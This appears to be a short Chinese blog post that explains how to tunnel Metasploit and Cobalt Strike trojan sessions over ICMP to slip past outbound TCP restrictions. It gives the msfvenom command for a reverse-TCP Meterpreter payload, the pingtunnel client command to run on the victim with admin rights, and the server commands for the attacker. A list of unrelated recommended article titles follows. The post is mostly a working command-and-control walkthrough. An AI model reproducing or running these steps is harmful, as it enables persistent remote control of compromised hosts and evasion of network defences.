隧道技术-tcp封装icmp出网

1.背景:

目标出网限制tcp协议

2.msf木马转发上线

生成木马:msfvenom -p windows/meterpreter/reverse_tcp Lhost=127.0.0.1 LPORT=3333 -f exe > msf1.exe

受害机器管理员权限执行:

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.3.195 -t 192.168.3.195:4444 -tcp 1 -noprint 1 -nolog 1

攻击机器执行:

./pingtunnel -type server

使用msf接受tcp协议木马会话

原理:

木马运行在受害主机使用本地3333端口连接,由tcp协议转换未icmp协议数据出网,由kali接收,并且再次转会tcp协议。

3.cs木马转发上线

cs创建监听器:

使用本地的127.0.0.1:9999tcp协议数据使用icmp封装传递给cs服务端。

cs服务端执行:./ping -type server

受害机器执行:

pingtunnel.exe -type client -l 127.0.0.1:9999-s csip -t csip:7777 -tcp 1 -noprint 1 -nolog 1、

相关推荐
日更嵌入式的打工仔1 小时前
PHY的自适应协商简析
网络·嵌入式硬件·自适应·phy
XMYX-02 小时前
解决 Apache/WAF SSL 证书链不完整导致的 PKIX path building failed 问题
网络协议·apache·ssl
XXYBMOOO2 小时前
Qt UDP 通信类详解与实现
开发语言·网络·c++·qt·网络协议·ui·udp
Jayyih2 小时前
嵌入式系统学习Day29(tcp)
网络·学习·tcp/ip
dog2502 小时前
乐观并发: TCP 与编程实践
网络·网络协议·tcp/ip
MoloXuanhe3 小时前
[TryHackMe]Wordpress: CVE-2021-29447(wp漏洞利用-SSRF+WpGetShell)
运维·网络·安全·tryhackme·thm
wanhengidc3 小时前
网页版的云手机都有哪些优势?
运维·网络·安全·游戏·智能手机
Hello.Reader3 小时前
一文吃透 Protobuf “Editions” 模式从概念、语法到迁移与实战
linux·服务器·网络·protobuf·editions
長琹4 小时前
AES加密算法详细加密步骤代码实现--身份证号码加解密系统
网络·数据库·人工智能·python·密码学
TechubNews6 小时前
Webus 与中国国际航空合作实现 XRP 支付
大数据·网络·人工智能·web3·区块链